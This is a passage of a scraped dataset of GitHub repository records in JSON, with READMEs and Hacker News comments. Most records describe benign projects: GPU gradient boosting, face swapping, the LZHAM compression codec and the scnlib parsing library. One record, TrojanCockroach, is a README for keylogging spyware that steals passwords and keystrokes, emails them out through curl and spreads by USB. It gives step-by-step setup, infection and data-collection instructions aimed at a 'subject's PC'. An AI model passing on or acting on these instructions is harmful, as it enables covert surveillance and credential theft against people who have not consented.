year={2019},\n volume={30},\n number={12},\n pages={2706-2717},\n }\n\n@article{wenthundergbm19,\n author = {Wen, Zeyi and Shi, Jiashuai and He, Bingsheng and Li, Qinbin and Chen, Jian},\n title = {{ThunderGBM}: Fast {GBDTs} and Random Forests on {GPUs}},\n journal = {Journal of Machine Learning Research},\n volume={21},\n year = {2020}\n}\n```\n### Related papers\n* Zeyi Wen, Jiashuai Shi, Bingsheng He, Jian Chen, Kotagiri Ramamohanarao and Qinbin Li. Exploiting GPUs for Efficient Gradient Boosting Decision Tree Training. IEEE Transactions on Parallel and Distributed Systems (TPDS), accepted in May 2019. [pdf](https://zeyiwen.github.io/papers/tpds19_gpugbdt.pdf)\n\n* Zeyi Wen, Hanfeng Liu, Jiashuai Shi, Qinbin Li, Bingsheng He, Jian Chen. ThunderGBM: Fast GBDTs and Random Forests on GPUs. Featured at JMLR MLOSS (Machine Learning Open Source Software). Year: 2020, Volume: 21, Issue: 108, Pages: 1\u22125. [pdf](https://github.com/Xtra-Computing/thundergbm/blob/master/thundergbm-full.pdf)\n\n* Zeyi Wen, Bingsheng He, Kotagiri Ramamohanarao, Shengliang Lu, and Jiashuai Shi. Efficient Gradient Boosted Decision Tree Training on GPUs. The 32nd IEEE Intern\national Parallel and Distributed Processing Symposium (IPDPS), pages 234-243, 2018. [pdf](https://www.comp.nus.edu.sg/~hebs/pub/IPDPS18-GPUGBDT.pdf)\n\n\n## Key members of ThunderGBM\n* [Zeyi Wen](https://zeyiwen.github.io), NUS (now at The University of Western Australia)\n* Hanfeng Liu, GDUFS (a visting student at NUS)\n* Jiashuai Shi, SCUT (a visiting student at NUS)\n* Qinbin Li, NUS\n* Advisor: [Bingsheng He](https://www.comp.nus.edu.sg/~hebs/), NUS\n* Collaborators: Jian Chen (SCUT)\n\n## Other information\n* This work is supported by a MoE AcRF Tier 2 grant (MOE2017-T2-1-122) and an NUS startup grant in Singapore.\n\n## Related libraries\n* [ThunderSVM](https://github.com/Xtra-Computing/thundersvm), which is another *Thunder* serier software tool developed by our group.\n* [XGBoost](https://github.com/dmlc/xgboost) | [LightGBM](https://github.com/Microsoft/LightGBM) | [CatBoost](https://github.com/catboost/catboost) | [cuML](https://github.com/rapidsai/cuml)\n", "readme_type": "markdown", "hn_comments": "Interesting workAnother fast machine learning project of the same team:\nhttps://bit.ly/2NxLaPv", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "MinhasKamal/TrojanCockroach", "link": "https://github.com/MinhasKamal/TrojanCockroach", "tags": ["spyware", "virus", "trojan", "keylogger", "pendrive", "trojan-cockroach", "cpp", "fud", "malware"], "stars": 652, "description": "A Stealthy Trojan Spyware", "lang": "C++", "repo_lang": "", "readme": "

Trojan Cockroach

\n\n[![Donate](https://img.shields.io/badge/Donate-PayPal-green.svg)](https://www.paypal.com/donate/?business=5KR6BA9MYTM62&no_recurring=0¤cy_code=USD)\n\n#### A Stealthy Trojan Spyware\n\nYou are looking at a **Trojan Virus** that steals data (ID, password; every key stroke) from PC (Windows XP or later), then emails them back to you. It spreads among PCs through USB drives, and is almost undetectable to any antivirus software.\n\n*Created only for learning purpose.*\n\n### Intro\n- [TrojanCockroach.cpp](https://github.com/MinhasKamal/TrojanCockroach/blob/master/com/minhaskamal/trojanCockroach/TrojanCockroach.cpp)- logs user's data, sends data through Transmit.exe, infects portable drive.\n- [Infect.cpp](https://github.com/MinhasKamal/TrojanCockroach/blob/master/com/minhaskamal/trojanCockroach/Infect.cpp)- installs the virus into computer from portable drive.\n- [Transmit.exe](https://github.com/MinhasKamal/TrojanCockroach/blob/master/com/minhaskamal/trojanCockroach/Transmit.exe)- emails data back.\n- [TrojanCockroach.lnk](https://github.com/MinhasKamal/TrojanCockroach/blob/master/com/minhaskamal/trojanCockroach/TrojanCockroach.lnk)- resides in the startup folder of PC and activates TrojanCockroach.exe.\n- [Infect.lnk](https://github.com/MinhasKamal/TrojanCockroach/blob/master/com/minhaskamal/trojanCockroach/Infect.lnk)- takes different attractive names in the infected portable drive, activates Infect.exe when clicked.\n- [DecodeMessage.cpp](https://github.com/MinhasKamal/TrojanCockroach/blob/master/com/minhaskamal/trojanCockroach/DecodeMessage.cpp)- used to decode received email.\n\n### Setup\n\n
    \n
  1. \nPreparation\n
    \n
      \n
    1. \n Download the full package from here.\n
    2. \n
      \n
    3. \n Change the method sendData() of TrojanCockroach.cpp- place your email and password in the command.\n
      \"change
      \n
    4. \n
      \n
    5. \n Compile TrojanCockroach.cpp & Infect.cpp. Transmit.exe is actually the executable distribution of curl for Windows.\n
    6. \n
      \n
    7. \n Place TrojanCockroach.exe, Infect.exe, Transmit.exe, Infect.lnk & TrojanCockroach.lnk in the same folder. This is how they look-\n
      \"Trojan
      \n
    8. \n
      \n
    9. \n Now run TrojanCockroach.exe then insert a pendrive (see the magic!). You will get a hidden folder and link file in your pendrive. The hidden folder contains the full package, & the link file is actually renamed form of Infect.lnk.\n
      \"Trojan
      \n
    10. \n
    \n
  2. \n
    \n
  3. \nAttack\n
    \n
      \n
    1. \n Insert the USB-Drive in the subject's PC (Yes, you have to start the spreading process from somewhere!). Run Infect.lnk and the spyware will be injected.\n
    2. \n
      \n
    3. \n The syware will be activated after a reboot. Now (after a restart) every time any USB-Drive is inserted in the affected PC, the virus will copy itself in that, and the cycle will start again.\n
    4. \n
    \n
  4. \n
    \n
  5. \nData Collection\n
    \n
      \n
    1. \n You need to wait several days (depending on the number of power on/off of the PC), before getting any data.\n
    2. \n
      \n
    3. \n After getting the email copy the full message to a text file. \n
      \"Trojan
      \n As the message has come through email certain characters are converted. To resolve that --- --- ---. \n
    4. \n
      \n
    5. \n Now, run DecodeMessage.exe for decoding the message as plain text. \n
      \"Trojan
      \n In this phase, you can look for specific patterns in the text, and thus get rid of most of the useless parts (like- mouse click, or same key-group press as happens during gaming).\n
    6. \n
    \n
  6. \n
\n
\n\n### Further \nYou may read [TrojanCockroachStory](https://github.com/MinhasKamal/TrojanCockroach/blob/master/TrojanCockroachStory.md) to get an overview of how the program works. You will get a clearer understanding of the project from its pre-project- **[StupidKeyLogger](https://github.com/MinhasKamal/StupidKeyLogger)**.\n\nThe project is perfectly runnable. However, I do not want newbies to abuse my project. So, I am **keeping some simple secrets unrevealed**. There are also some intentionally created **holes in this 'README'**. I have made some **nonsense changes in the code** too; so that- no one can run it effectively without getting his hands dirty. I believe these plain obstacles can easily be overcome by ***ACTUAL PROGRAMMERS*** :)\n\n**Note:** *I will not also take any responsibility of someone else's ill act with this program.* But I do believe that a real learner will learn a lot from this.\n\n\n### License\n\"MIT
Trojan Cockroach is licensed under MIT License.\n", "readme_type": "markdown", "hn_comments": "Why is it \"almost undetectable to any antivirus software\"? It hasn't been used in the wild therefore they haven't taken its signature? There's no sarcasm in my question, I genuinely want to know this.hmm... good project for learning purposeThis program is a Trojan Virus that steals data from PC and emails it back to the author. It spreads among PCs through USB drives. It is undetectable by any antivirus software.It is created only for educational purpose.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "hrastnik/FaceSwap", "link": "https://github.com/hrastnik/FaceSwap", "tags": ["face", "face-swap", "dlib", "opencv", "swap", "real-time"], "stars": 652, "description": "Real-time FaceSwap application built with OpenCV and dlib", "lang": "C++", "repo_lang": "", "readme": "# [Youtube video](https://youtu.be/32i1ca8pcTg)\n\n# How to run?\n\nDownload [OpenCV](http://opencv.org/downloads.html) and [dlib](http://dlib.net/)\n\n- Setup OpenCV\n - Run the downloaded OpenCV executable file and select a directory to extract the OpenCV library (for example D:\\opencv\\)\n- Setup dlib\n - Extract the downloaded zip file to a directory (for example D:\\dlib)\n- Download and install Visual Studio 2015 or later versions\n- Run Visual Studio\n- Create new empty project and name it something (for example MyProject)\n- Make sure the \"Debug\" solution configuration is selected\n- In Visual Studio open the Solution Explorer window\n- Right click MyProject and choose Properties\n- Click the \"Configuration Manager...\" button in the top left corner\n- Setup the configuration for the debug\n - In the active solution platform select x64\n - Close the Configuration Manager window\n - In the property window make sure the selected Configuration in the top left is \"Debug\" and Platform is \"x64\"\n - In the panel on the left choose C/C++\n - In the Additional Include Directories field add two directories:\n - \"D:\\opencv\\opencv\\build\\include\"\n - \"D:\\dlib\\dlib-19.2\"\n * Note the path might be different if you have different dlib version\n - In the panel on the left choose Linker>General\n - In the Additional Library Directories add \"D:\\opencv\\opencv\\build\\x64\\vc14\\lib\"\n * Note the path might be different if you have different architecture or VS version\n - In the panel on the left choose Linker>Input\n - In the Additional Dependencies add \"opencv_world320d.lib\"\n - Click Apply\n \n- Change the Configuration in the top left to \"Release\" and repeat \n- Setup the configuration for the release\n - In the panel on the left choose C/C++\n - In the Additional Include Directories field add two directories:\n - \"D:\\opencv\\opencv\\build\\include\"\n - \"D:\\dlib\\dlib-19.2\"\n * Note the path might be different if you have different dlib version\n - In the panel on the left choose Linker>General\n - In the Additional Library Directories add \"D:\\opencv\\opencv\\build\\x64\\vc14\\lib\"\n * Note the path might be different if you have different architecture or VS version\n - In the panel on the left choose Linker>Input\n - In the Additional Dependencies add \"opencv_world320.lib\"\n\n- Close the property window\n- Right click Source Files in the Solution Explorer\n- Select \"Add Existing Item...\" and add the .cpp files from this project\n- Right click Header Files in the Solution Explorer\n- Select \"Add Existing Item...\" and add the .h files from this project\n- Copy haarcascade_frontalface_default.xml from OpenCV sources/data/haarcascades directory to project directory\n- Download shape_predictor_68_face_landmarks.dat from http://sourceforge.net/projects/dclib/files/dlib/v18.10/shape_predictor_68_face_landmarks.dat.bz2 and place in project directory \n\nAfter that FaceSwap should work. \n\n# Building on GNU/Linux\n\nIf you want to run this on Ubuntu 16.04 run this set of commands:\n\n sudo apt install libopencv-dev liblapack-dev libdlib-dev\n wget http://sourceforge.net/projects/dclib/files/dlib/v18.10/shape_predictor_68_face_landmarks.dat.bz2\n bunzip2 *.bz2\n ln -s /usr/share/opencv/haarcascades/haarcascade_frontalface_default.xml .\n\n g++ -std=c++1y *.cpp $(pkg-config --libs opencv lapack) -ldlib \n ./a.out\n \nSpecial thanks to https://github.com/nqzero for providing the build commands.\n\n# Building on MacOS\n\nSpecial thanks to https://github.com/shaunharker for providing the build commands.\n\n brew install lapack\n brew install openblas\n brew install opencv\n brew install dlib --with-openblas\n git clone https://github.com/hrastnik/FaceSwap.git\n cd FaceSwap\n wget http://sourceforge.net/projects/dclib/files/dlib/v18.10/shape_predictor_68_face_landmarks.dat.bz2\n bunzip2 *.bz2\n ln -s /usr/local/share/opencv/haarcascades/haarcascade_frontalface_default.xml .\n export PKG_CONFIG_PATH=/usr/local/opt/lapack/lib/pkgconfig:/usr/local/opt/openblas/lib/pkgconfig:$PKG_CONFIG_PATH\n g++ -std=c++1y *.cpp $(pkg-config --libs opencv lapack openblas) -ldlib\n mkdir bin\n mv a.out bin\n cd bin\n ./a.out\n\n# How does it work?\n\nThe algorithm searches until it finds two faces in the frame. Then it estimates facial landmarks using dlib face landmarks. Facial landmarks are used to \"cut\" the faces out of the frame and to estimate the transformation matrix used to move one face over the other.\n\nThe faces are then color corrected using histogram matching and in the end the edges of the faces are feathered and blended in the original frame.\n\n# Result\nBefore...\n\n[![Before](./images/before.jpg)](https://youtu.be/32i1ca8pcTg)\n\nAfter...\n\n[![After](./images/after.jpg)](https://youtu.be/32i1ca8pcTg)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "richgel999/lzham_codec", "link": "https://github.com/richgel999/lzham_codec", "tags": [], "stars": 652, "description": "Lossless data compression codec with LZMA-like ratios but 1.5x-8x faster decompression speed, C/C++", "lang": "C++", "repo_lang": "", "readme": "LZHAM - Lossless Data Compression Codec\n=============\n\nPublic Domain (see LICENSE)\n\n

LZHAM is a lossless data compression codec written in C/C++ (specifically C++03), with a compression ratio similar to LZMA but with 1.5x-8x faster decompression speed. It officially supports Linux x86/x64, Windows x86/x64, \nOSX, and iOS, with Android support on the way.

\n\nAn improved version of LZHAM, with better compression, is [here](https://github.com/richgel999/lzham_codec_devel).\n\n

The old alpha version of LZHAM (bitstream incompatible with the v1.x release) is here: https://github.com/richgel999/lzham_alpha

\n\n

Introduction

\n\n

LZHAM is a lossless (LZ based) data compression codec optimized for particularly fast decompression at very high compression ratios with a zlib compatible API. \nIt's been developed over a period of 3 years and alpha versions have already shipped in many products. (The alpha is here: https://code.google.com/p/lzham/)\nLZHAM's decompressor is slower than zlib's, but generally much faster than LZMA's, with a compression ratio that is typically within a few percent of LZMA's and sometimes better.

\n\n

LZHAM's compressor is intended for offline use, but it is tested alongside the decompressor on mobile devices and is usable on the faster settings.

\n\n

LZHAM's decompressor currently has a higher cost to initialize than LZMA, so the threshold where LZHAM is typically faster vs. LZMA decompression is between 1000-13,000 of \n*compressed* output bytes, depending on the platform. It is not a good small block compressor: it likes large (10KB-15KB minimum) blocks.

\n\n

LZHAM has simple support for patch files (delta compression), but this is a side benefit of its design, not its primary use case. Internally it supports LZ matches up \nto ~64KB and very large dictionaries (up to .5 GB).

\n\n

LZHAM may be valuable to you if you compress data offline and distribute it to many customers, care about read/download times, and decompression speed/low CPU+power use \nare important to you.

\n\n

I've been profiling LZHAM vs. LZMA and publishing the results on my blog: http://richg42.blogspot.com

\n\n

Some independent benchmarks of the previous alpha versions: http://heartofcomp.altervista.org/MOC/MOCADE.htm, http://mattmahoney.net/dc/text.html

\n\n

LZHAM has been integrated into the 7zip archiver (command line and GUI) as a custom codec plugin: http://richg42.blogspot.com/2015/02/lzham-10-integrated-into-7zip-command.html

\n\n

10GB Benchmark Results

\n\nResults with [7zip-LZHAM 9.38 32-bit](http://richg42.blogspot.com/2015/02/7zip-938-custom-codec-plugin-for-lzham.html) (64MB dictionary) on [Matt Mahoney's 10GB benchmark](http://mattmahoney.net/dc/10gb.html):\n\n```\nLZHAM (-mx=8): 3,577,047,629 Archive Test Time: 70.652 secs\nLZHAM (-mx=9): 3,573,782,721 Archive Test Time: 71.292 secs\nLZMA (-mx=9): 3,560,052,414 Archive Test Time: 223.050 secs\n7z .ZIP : 4,681,291,655 Archive Test Time: 73.304 secs (unzip v6 x64 test time: 61.074 secs)\n```\n\n

Most Common Question: So how does it compare to other libs like LZ4?

\n\nThere is no single compression algorithm that perfectly suites all use cases and practical constraints. LZ4 and LZHAM are tools which lie at completely opposite ends of the spectrum:\n\n* LZ4: A symmetrical codec with very fast compression and decompression but very low ratios. Its compression ratio is typically less than even zlib's (which uses a 21+ year old algorithm). \nLZ4 does a good job of trading off a large amount of compression ratio for very fast overall throughput.\nUsage example: Reading LZMA/LZHAM/etc. compressed data from the network and decompressing it, then caching this data locally on disk using LZ4 to reduce disk usage and decrease future loading times.\n\n* LZHAM: A very asymmetrical codec with slow compression speed, but with a very competitive (LZMA-like) compression ratio and reasonably fast decompression speeds (slower than zlib, but faster than LZMA).\nLZHAM trades off a lot of compression throughput for very high ratios and higher decompression throughput relative to other codecs in its ratio class (which is LZMA, which runs circles around LZ4's ratio).\nUsage example: Compress your product's data once on a build server, distribute it to end users over a slow media like the internet, then decompress it on the end user's device.\n\n

How Much Memory Does It Need?

\n\nFor decompression it's easy to compute:\n* Buffered mode: decomp_mem = dict_size + ~34KB for work tables\n* Unbuffered mode: decomp_mem = ~34KB\n\nI'll be honest here, the compressor is currently an angry beast when it comes to memory. The amount needed depends mostly on the compression level and dict. size. It's *approximately* (max_probes=128 at level -m4):\ncomp_mem = min(512 * 1024, dict_size / 8) * max_probes * 6 + dict_size * 9 + 22020096\n\nCompression mem usage examples from Windows lzhamtest_x64 (note the equation is pretty off for small dictionary sizes):\n* 32KB: 11MB\n* 128KB: 21MB\n* 512KB: 63MB\n* 1MB: 118MB\n* 8MB: 478MB\n* 64MB: 982MB\n* 128MB: 1558MB\n* 256MB: 2710MB\n* 512MB: 5014MB\n\n

Compressed Bitstream Compatibility

\n\n

v1.0's bitstream format is now locked in place, so any future v1.x releases will be backwards/forward compatible with compressed files \nwritten with v1.0. The only thing that could change this are critical bugfixes.

\n\n

Note LZHAM v1.x bitstreams are NOT backwards compatible with any of the previous alpha versions on Google Code.

\n\n

Platforms/Compiler Support

\n\nLZHAM currently officially supports x86/x64 Linux, iOS, OSX, FreeBSD, and Windows x86/x64. At one time the codec compiled and ran fine on Xbox 360 (PPC, big endian). Android support is coming next.\nIt should be easy to retarget by modifying the macros in lzham_core.h.

\n\n

LZHAM has optional support for multithreaded compression. It supports gcc built-ins or MSVC intrinsics for atomic ops. For threading, it supports OSX \nspecific Pthreads, generic Pthreads, or Windows API's.

\n\n

For compilers, I've tested with gcc, clang, and MSVC 2008, 2010, and 2013. In previous alphas I also compiled with TDM-GCC x64.

\n\n

API

\n\nLZHAM supports streaming or memory to memory compression/decompression. See include/lzham.h. LZHAM can be linked statically or dynamically, just study the \nheaders and the lzhamtest project. \nOn Linux/OSX, it's only been tested with static linking so far.\n\nLZHAM also supports a usable subset of the zlib API with extensions, either include/zlib.h or #define LZHAM_DEFINE_ZLIB_API and use include/lzham.h.\n\n

Usage Tips

\n\n* Always try to use the smallest dictionary size that makes sense for the file or block you are compressing, i.e. don't use a 128MB dictionary for a 15KB file. The codec\ndoesn't automatically choose for you because in streaming scenarios it has no idea how large the file or block will be.\n* The larger the dictionary, the more RAM is required during compression and decompression. I would avoid using more than 8-16MB dictionaries on iOS.\n* For faster decompression, prefer \"unbuffered\" decompression mode vs. buffered decompression (avoids a dictionary alloc and extra memcpy()'s), and disable adler-32 checking. Also, use the built-in LZHAM API's, not the\nzlib-style API's for fastest decompression.\n* Experiment with the \"m_table_update_rate\" compression/decompression parameter. This setting trades off a small amount of ratio for faster decompression.\nNote the m_table_update_rate decompression parameter MUST match the setting used during compression (same for the dictionary size). It's up to you to store this info somehow.\n* Avoid using LZHAM on small *compressed* blocks, where small is 1KB-10KB compressed bytes depending on the platform. LZHAM's decompressor is only faster than LZMA's beyond the small block threshold.\nOptimizing LZHAM's decompressor to reduce its startup time relative to LZMA is a high priority.\n* For best compression (I've seen up to ~4% better), enable the compressor's \"extreme\" parser, which is much slower but finds cheaper paths through a much denser parse graph.\nNote the extreme parser can greatly slow down on files containing large amounts of repeated data/strings, but it is guaranteed to finish.\n* The compressor's m_level parameter can make a big impact on compression speed. Level 0 (LZHAM_COMP_LEVEL_FASTEST) uses a much simpler greedy parser, and the other levels use \nnear-optimal parsing with different heuristic settings.\n* Check out the compressor/decompressor reinit() API's, which are useful if you'll be compressing or decompressing many times. Using the reinit() API's is a lot cheaper than fully \ninitializing/deinitializing the entire codec every time.\n* LZHAM's compressor is no speed demon. It's usually slower than LZMA's, sometimes by a wide (~2x slower or so) margin. In \"extreme\" parsing mode, it can be many times slower. \nThis codec was designed with offline compression in mind.\n* One significant difference between LZMA and LZHAM is how uncompressible files are handled. LZMA usually expands uncompressible files, and its decompressor can bog down and run extremely \nslowly on uncompressible data. LZHAM internally detects when each 512KB block is uncompressible and stores these blocks as uncompressed bytes instead. \nLZHAM's literal decoding is significantly faster than LZMA's, so the more plain literals in the output stream, the faster LZHAM's decompressor runs vs. LZMA's.\n* General advice (applies to LZMA and other codecs too): If you are compressing large amounts of serialized game assets, sort the serialized data by asset type and compress the whole thing as a single large \"solid\" block of data.\nDon't compress each individual asset, this will kill your ratio and have a higher decompression startup cost. If you need random access, consider compressing the assets lumped \ntogether into groups of a few hundred kilobytes (or whatever) each.\n* LZHAM is a raw codec. It doesn't include any sort of preprocessing: EXE rel to abs jump transformation, audio predictors, etc. That's up to you\nto do, before compression.\n\n

Codec Test App

\n\nlzhamtest_x86/x64 is a simple command line test program that uses the LZHAM codec to compress/decompress single files. \nlzhamtest is not intended as a file archiver or end user tool, it's just a simple testbed.\n\n-- Usage examples:\n\n- Compress single file \"source_filename\" to \"compressed_filename\":\n\tlzhamtest_x64 c source_filename compressed_filename\n\t\n- Decompress single file \"compressed_filename\" to \"decompressed_filename\":\n lzhamtest_x64 d compressed_filename decompressed_filename\n\n- Compress single file \"source_filename\" to \"compressed_filename\", then verify the compressed file decompresses properly to the source file:\n\tlzhamtest_x64 -v c source_filename compressed_filename\n\n- Recursively compress all files under specified directory and verify that each file decompresses properly:\n\tlzhamtest_x64 -v a c:\\source_path\n\t\n-- Options\t\n\t\n- Set dictionary size used during compressed to 1MB (2^20):\n\tlzhamtest_x64 -d20 c source_filename compressed_filename\n\t\nValid dictionary sizes are [15,26] for x86, and [15,29] for x64. (See LZHAM_MIN_DICT_SIZE_LOG2, etc. defines in include/lzham.h.)\nThe x86 version defaults to 64MB (26), and the x64 version defaults to 256MB (28). I wouldn't recommend setting the dictionary size to \n512MB unless your machine has more than 4GB of physical memory.\n\n- Set compression level to fastest:\n\tlzhamtest_x64 -m0 c source_filename compressed_filename\n\t\n- Set compression level to uber (the default):\n\tlzhamtest_x64 -m4 c source_filename compressed_filename\n\t\n- For best possible compression, use -d29 to enable the largest dictionary size (512MB) and the -x option which enables more rigorous (but ~4X slower!) parsing:\n\tlzhamtest_x64 -d29 -x -m4 c source_filename compressed_filename\n\nSee lzhamtest_x86/x64.exe's help text for more command line parameters.\n\n

Compiling LZHAM

\n\n- Linux: Use \"cmake .\" then \"make\". The cmake script only supports Linux at the moment. (Sorry, working on build systems is a drag.)\n- OSX/iOS: Use the included XCode project. (NOTE: I haven't merged this over yet. It's coming!)\n- Windows: Use the included VS 2010 project\n\nIMPORTANT: With clang or gcc compile LZHAM with \"No strict aliasing\" ENABLED: -fno-strict-aliasing\n\nI DO NOT test or develop the codec with strict aliasing:\n* https://lkml.org/lkml/2003/2/26/158\n* http://stackoverflow.com/questions/2958633/gcc-strict-aliasing-and-horror-stories\n\nIt might work fine, I don't know yet. This is usually not a problem with MSVC, which defaults to strict aliasing being off.\n\n

ANSI C/C++

\n\nLZHAM supports compiling as plain vanilla ANSI C/C++. To see how the codec configures itself check out lzham_core.h and search for \"LZHAM_ANSI_CPLUSPLUS\". \nAll platform specific stuff (unaligned loads, threading, atomic ops, etc.) should be disabled when this macro is defined. Note, the compressor doesn't use threads \nor atomic operations when built this way so it's going to be pretty slow. (The compressor was built from the ground up to be threaded.)\n\n

Known Problems

\n\n

LZHAM's decompressor is like a drag racer that needs time to get up to speed. LZHAM is not intended or optimized to be used on \"small\" blocks of data (less \nthan ~10,000 bytes of *compressed* data on desktops, or around 1,000-5,000 on iOS). If your usage case involves calling the codec over and over with tiny blocks \nthen LZMA, LZ4, Deflate, etc. are probably better choices.

\n\n

The decompressor still takes too long to init vs. LZMA. On iOS the cost is not that bad, but on desktop the cost is high. I have reduced the startup cost vs. the \nalpha but there's still work to do.

\n\n

The compressor is slower than I would like, and doesn't scale as well as it could. I added a reinit() method to make it initialize faster, but it's not a speed demon. \nMy focus has been on ratio and decompression speed.

\n\n

I use tabs=3 spaces, but I think some actual tabs got in the code. I need to run the sources through ClangFormat or whatever.

\n\n

Special Thanks

\n\n

Thanks to everyone at the http://encode.ru forums. I read these forums as a lurker before working on LZHAM, and I studied every LZ related \npost I could get my hands on. Especially anything related to LZ optimal parsing, which still seems like a black art. LZHAM was my way of \nlearning how to implement optimal parsing (and you can see this if you study the progress I made in the early alphas on Google Code).

\n\n

Also, thanks to Igor Pavlov, the original creator of LZMA and 7zip, for advancing the start of the art in LZ compression.

\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "eliaskosunen/scnlib", "link": "https://github.com/eliaskosunen/scnlib", "tags": ["c-plus-plus", "cpp", "scanf", "input", "io", "parsing", "ranges", "header-only"], "stars": 652, "description": "scanf for modern C++", "lang": "C++", "repo_lang": "", "readme": "# scnlib\n\n[![Ubuntu 20 builds](https://github.com/eliaskosunen/scnlib/actions/workflows/ubuntu-20.yml/badge.svg?branch=master)](https://github.com/eliaskosunen/scnlib/actions/workflows/ubuntu-20.yml)\n[![Ubuntu 18 builds](https://github.com/eliaskosunen/scnlib/actions/workflows/ubuntu-18.yml/badge.svg?branch=master)](https://github.com/eliaskosunen/scnlib/actions/workflows/ubuntu-18.yml)\n[![macOS builds](https://github.com/eliaskosunen/scnlib/actions/workflows/macos.yml/badge.svg?branch=master)](https://github.com/eliaskosunen/scnlib/actions/workflows/macos.yml)\n[![Windows builds](https://github.com/eliaskosunen/scnlib/actions/workflows/windows.yml/badge.svg?branch=master)](https://github.com/eliaskosunen/scnlib/actions/workflows/windows.yml)\n[![Alpine builds](https://github.com/eliaskosunen/scnlib/actions/workflows/alpine.yml/badge.svg?branch=master)](https://github.com/eliaskosunen/scnlib/actions/workflows/alpine.yml)\n[![Code Coverage](https://codecov.io/gh/eliaskosunen/scnlib/branch/master/graph/badge.svg?token=LyWrDluna1)](https://codecov.io/gh/eliaskosunen/scnlib)\n\n[![Latest Release](https://img.shields.io/github/v/release/eliaskosunen/scnlib?sort=semver&display_name=tag)](https://github.com/eliaskosunen/scnlib/releases)\n[![License](https://img.shields.io/github/license/eliaskosunen/scnlib.svg)](https://github.com/eliaskosunen/scnlib/blob/master/LICENSE)\n[![C++ Standard](https://img.shields.io/badge/C%2B%2B-11%2F14%2F17%2F20%2F23-blue.svg)](https://img.shields.io/badge/C%2B%2B-11%2F14%2F17%2F20%2F23-blue.svg)\n\n```cpp\n#include \n#include \n\nint main() {\n int i;\n // Read an integer from stdin\n // with an accompanying message\n scn::prompt(\"What's your favorite number? \", \"{}\", i);\n printf(\"Oh, cool, %d!\", i);\n}\n\n// Example result:\n// What's your favorite number? 42\n// Oh, cool, 42!\n```\n\n## What is this?\n\n`scnlib` is a modern C++ library for replacing `scanf` and `std::istream`.\nThis library attempts to move us ever so closer to replacing `iostream`s and C stdio altogether.\nIt's faster than `iostream` (see Benchmarks) and type-safe, unlike `scanf`.\nThink [{fmt}](https://github.com/fmtlib/fmt) but in the other direction.\n\nThis library is the reference implementation of the ISO C++ standards proposal\n[P1729 \"Text Parsing\"](https://wg21.link/p1729).\n\nThe library is currently deemed production-ready, and should be reasonably bug-free;\nit's tested and fuzzed extensively.\n\nThe master-branch of the repository targets the next minor release (v1.2), and is backwards-compatible.\nThe dev-branch targets the next major release (v2.0), and may contain backwards-incompatible changes, and may have lacking documentation.\n\n## Documentation\n\nThe documentation can be found online, from https://scnlib.readthedocs.io.\n\nTo build the docs yourself, build the `doc` and `doc-sphinx` targets generated by CMake.\nThe `doc` target requires Doxygen, and `doc-sphinx` requires Python 3.8, Sphinx and Breathe.\n\n## Examples\n\n### Reading a `std::string`\n\n```cpp\n#include \n#include \n#include \n\nint main() {\n std::string word;\n auto result = scn::scan(\"Hello world\", \"{}\", word);\n\n std::cout << word << '\\n'; // Will output \"Hello\"\n std::cout << result.range_as_string() << '\\n'; // Will output \" world!\"\n}\n```\n\n### Reading multiple values\n\n```cpp\n#include \n\nint main() {\n int i, j;\n auto result = scn::scan(\"123 456 foo\", \"{} {}\", i, j);\n // result == true\n // i == 123\n // j == 456\n\n std::string str;\n ret = scn::scan(result.range(), \"{}\", str);\n // result == true\n // str == \"foo\"\n}\n```\n\n### Using the `tuple`-return API\n\n```cpp\n#include \n#include \n\nint main() {\n auto [r, i] = scn::scan_tuple(\"42\", \"{}\");\n // r is a result object, contextually convertible to `bool`\n // i == 42\n}\n```\n\n### Error handling\n\n```cpp\n#include \n#include \n#include \n\nint main() {\n int i;\n // \"foo\" is not a valid integer\n auto result = scn::scan(\"foo\", \"{}\", i);\n if (!result) {\n // i is not touched (still unconstructed)\n // result.range() == \"foo\" (range not advanced)\n std::cout << \"Integer parsing failed with message: \" << result.error().msg() << '\\n';\n }\n}\n```\n\n## Features\n\n - Blazing-fast parsing of values (see benchmarks)\n - Modern C++ interface, featuring type safety (variadic templates), convenience (ranges) and customizability\n - No << chevron >> hell\n - Requires C++11 or newer\n - \"{python}\"-like format string syntax\n - Optionally header only\n - Minimal code size increase (see benchmarks)\n - No exceptions (supports building with `-fno-exceptions -fno-rtti` with minimal loss of functionality)\n - Localization requires exceptions, because of the way `std::locale` is\n - Unicode-aware\n\n## Installing\n\n`scnlib` uses CMake.\nIf your project already uses CMake, integration is easy.\nFirst, clone, build, and install the library\n\n```sh\n# Whereever you cloned scnlib to\n$ mkdir build\n$ cd build\n$ cmake ..\n$ make -j\n$ make install\n```\n\nThen, in your project:\n\n```cmake\n# Find scnlib package\nfind_package(scn CONFIG REQUIRED)\n\n# Target which you'd like to use scnlib\n# scn::scn-header-only to use the header-only version\nadd_executable(my_program ...)\ntarget_link_libraries(my_program scn::scn)\n```\n\nAlternatively, if you have `scnlib` downloaded somewhere, or maybe even bundled inside your project (like a git submodule),\nyou can use `add_subdirectory`:\n\n```cmake\nadd_subdirectory(path/to/scnlib)\n\n# like above\nadd_executable(my_program ...)\ntarget_link_libraries(my_program scn::scn)\n```\n\nSee docs for usage without CMake.\n\n## Compiler support\n\nEvery commit is tested with\n * gcc 5.5 and newer (until v11)\n * clang 6.0 and newer (until v13)\n * Visual Studio 2019 and 2022\n * clang 12 and gcc 11 on macOS Catalina\n\nwith very extreme warning flags (see cmake/flags.cmake) and with multiple build configurations for each compiler.\n\nOther compilers and compiler versions may work, but it is not guaranteed.\nIf your compiler does not work, it may be a bug in the library.\nHowever, support will not be provided for:\n\n * GCC 4.9 (or earlier): C++11 support is too buggy\n * VS 2015 (or earlier): unable to handle templates\n\nVS 2017 is not tested, as GitHub Actions has deprecated the support for it.\nThe last commit tested and verified to work with VS 2017 is\n[32be3f9](https://github.com/eliaskosunen/scnlib/commit/32be3f9) (post-v0.4).\n\nThe code is only tested on amd64 machines (both win32 and win64 on Windows),\nbecause that's the only architecture GitHub Actions has runners for.\nThe last commit tested and verified to work with both 32-bit and 64-bit ARM and PPC is\n[0621443](https://github.com/eliaskosunen/scnlib/commit/0621443) 